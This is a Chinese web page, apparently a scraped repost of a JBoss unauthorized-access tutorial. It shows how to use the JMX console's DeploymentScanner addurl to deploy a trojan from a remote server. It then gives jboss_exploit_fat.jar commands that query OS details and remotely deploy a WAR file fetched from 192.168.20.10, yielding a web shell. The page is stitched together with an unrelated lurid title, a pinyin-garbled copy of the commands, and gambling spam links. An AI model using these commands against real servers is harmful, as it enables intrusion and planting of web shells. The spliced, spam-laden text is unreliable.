文章正文

安娜情欲史_WEB中间件--Jboss未授权访问,

1,Jboss未授权访问部署木马

发现存在Jboss默认页面,点进控制页

点击 Jboss.deployment 进入应用部署页面
也可以直接输入此URL进入

http://www.ctfswiki.com:8080//jmxconsole/HtmlAdaptoraction=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL


搭建远程木马服务器,可以用apache等web服务器来搭建,通过addurl参数进行木马的远程部署

部署成功,访问木马地址

最后附上一个jboss未授权访问EXP,备用,使用说明

1. 查看系统名称

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

2. 查看系统版本

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion


3.远程部署war

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.20.10/no.war

获得shell地址:
www.any.com:8080/no/index.jsp

1. zha kan xi tong ming cheng java jar jboss_exploit_fat. jar i http: www. any. com: 8080 invoker JMXInvokerServlet get jboss. system: type ServerInfo OSName 2. zha kan xi tong ban ben java jar jboss_exploit_fat. jar i http: www. any. com: 8080 invoker JMXInvokerServlet get jboss. system: type ServerInfo OSVersion 3. yuan cheng bu shu war java jar jboss_exploit_fat. jar i http: www. any. com: 8080 invoker JMXInvokerServlet invoke jboss. system: service MainDeployer deploy http: 192. 168. 20. 10 no. war huo de shell di zhi: www. any. com: 8080 no index. jsp

当前文章:http://www.xjj8782.com/he2/89719-1106356-63908.html

发布时间:09:03:48

香港正版挂牌彩图资料??www.508118.com??www.61633.com??管家婆今期玄机图??香港赛马会??www.661139.com??六合生肖彩图??www.246xs.com??最快开奖网??13334新铁算盘??

香港正版挂牌彩图资料??www.508118.com??www.61633.com??管家婆今期玄机图??香港赛马会??www.661139.com??六合生肖彩图??www.246xs.com??最快开奖网??13334新铁算盘?? |